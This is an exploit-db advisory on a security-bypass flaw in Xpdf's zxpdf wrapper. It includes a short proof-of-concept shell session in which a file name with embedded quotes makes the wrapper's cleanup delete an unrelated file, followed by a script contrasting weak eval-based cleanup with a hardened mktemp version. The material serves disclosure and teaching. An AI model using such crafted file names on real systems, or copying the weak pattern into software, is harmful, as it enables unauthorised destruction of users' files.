Xpdf 3.02-13 – ‘zxpdf’ Security Bypass

  • Author: Chung-chieh Shan
    Date: 2011-08-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36016/
  • source: https://www.securityfocus.com/bid/49007/info
    
    Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
    
    Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. 
    
    $ touch y # The unrelated victim file
    $ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file
    $ xpdf '" y ".pdf.gz' # View it using xpdf
    Error: May not be a PDF file (continuing anyway)
    Error: PDF file is damaged - attempting to reconstruct xref table...
    Error: Couldn't find trailer dictionary
    Error: Couldn't read xref table
    rm: cannot remove `/tmp/': Is a directory
    $ ls -l y # The victim file is gone!
    ls: cannot access y: No such file or directory
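
The session above ends with `rm` being handed `/tmp/` and `y` as separate arguments, which is what happens when a cleanup command is assembled as text around a file name and then parsed a second time. The sketch below is an added example, not the zxpdf source: it assumes a wrapper that derives its temporary path from the input name, and the function names and scratch-directory layout are hypothetical. It puts that weak pattern next to a hardened cleanup.

```shell
#!/bin/sh
# Added illustration of the failure class shown in the session above.
# Not the zxpdf source; function names and layout are hypothetical.

NAME='" y ".pdf.gz'   # constructed hostile file name, same as in the session

# Weak: the cleanup command is built as a string and parsed a second time
# (eval here; a trap given as a string is re-parsed the same way), so the
# quotes inside the file name close the argument early.
cleanup_weak() {      # $1 = scratch dir, $2 = input file name
    tmp="$1/$(basename "$2" .gz)"
    eval "rm -f \"$tmp\"" 2>/dev/null || true
}

# Hardened: mktemp chooses the name, so the input never becomes part of the
# path, and the variable is expanded once, quoted, after "--".
cleanup_safe() {      # $1 = scratch dir, $2 = input file name (not used in the path)
    tmp=$(mktemp "$1/view.XXXXXX") || return 1
    rm -f -- "$tmp"
}

# Returns 0 if the bystander file "y" survives the given cleanup routine.
bystander_survives() {   # $1 = name of the cleanup function to exercise
    box=$(mktemp -d) || return 2
    rc=0
    ( cd "$box" && : > y && "$1" "$box" "$NAME"; [ -e "$box/y" ] ) || rc=$?
    rm -rf -- "$box"
    return "$rc"
}

# Run both variants inside throwaway directories and report the outcome.
for f in cleanup_weak cleanup_safe; do
    if bystander_survives "$f"; then
        echo "$f: y kept"
    else
        echo "$f: y deleted"
    fi
done
```

Everything runs inside directories created by `mktemp -d`, so no file outside the scratch area is touched.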